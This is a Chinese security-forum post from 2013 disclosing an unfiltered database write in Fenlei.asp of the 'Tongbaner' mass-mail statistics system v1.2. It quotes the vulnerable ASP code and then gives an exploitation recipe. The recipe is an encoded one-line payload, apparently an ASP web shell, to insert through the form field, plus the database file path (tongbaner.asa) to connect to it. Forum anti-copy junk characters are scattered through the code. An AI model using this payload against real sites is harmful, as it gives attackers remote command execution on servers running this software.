找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2550|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp
/ V+ K# ^# \0 e, m, U
( m! P: h) ~8 C6 ?2 iIF Request.QueryString("Action")="del" Then - J7 ^6 c: N# v) Q0 b+ l) j( k$ ?
ID=Request.QueryString("ID") * e7 Q+ n6 _: C8 g7 M' t2 }
IF Countss ("tui","Fenlei",ID )<>0 then . I0 V0 G1 t/ m: K4 E2 G5 I& v7 _
'略
4 ]% _$ K2 h! ]6 ]IF Request.QueryString("Action")="Add" Then , {1 _' A$ Z) \" T6 C6 n* k3 o
Tname=Request.Form("Typename") ( O8 e4 a$ [8 u8 }
Set Rs=Server.CreateObject("adodb.Recordset") % R  T' o& \9 B0 H
Sql="Select * From Fenlei Order by id Desc "
0 p6 Z: z/ C; x" V0 z# wRs.Open Sql,Conn,1,3
) `6 z$ v: W) M7 WRs.Addnew % r/ w1 r+ y% n0 U9 a/ r9 ?1 P
Rs("Typename")=Tname : n# e4 Y. b7 h
'略 4 H; A8 D2 c' ^; J0 o3 b
Set Rs=Server.CreateObject("adodb.Recordset")
4 d- T( l& s) O3 Y8 Y9 u( k" ^) zSql="Select * From Fenlei Order by id Desc " 1 _+ r+ w, h1 f/ }- D. ]8 t
Rs.Open Sql,Conn,1,1
- X3 w2 P) M$ y$ g3 ^* ]'略 # E6 Y1 ?# |& l- M
%>, \# B$ ]: _' a& `! ~. |
. ]) ]8 a! N- Y% @
% d' Q6 k* S5 ?
; B2 G1 w" W; x, F
没有过滤,直接写入数据库。9 \0 J, C1 O) ^3 a9 T' f

/ h, \, A7 P- R, C/ u利用方法:, d- n) |6 m4 e# b3 O1 \

1 a" y: s# o6 R+ S- n0 a9 D, P+ Q; Z- Z插入:┼攠數畣整爠煥敵瑳∨≡┩>
0 m- W  x% ~9 x  E0 g' X+ O0 c . O% f% A1 p) I
, c5 v& e9 B6 P- F; h: ?( m; N
连接: http://www.xxx.com/###tongbaner.asa # x0 C/ ]5 @* u* V/ P7 r6 ]
'默认安装文件: % k+ d. j+ B5 l
'install.asp2 t: q1 ^3 M4 {$ k! l$ r# k
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表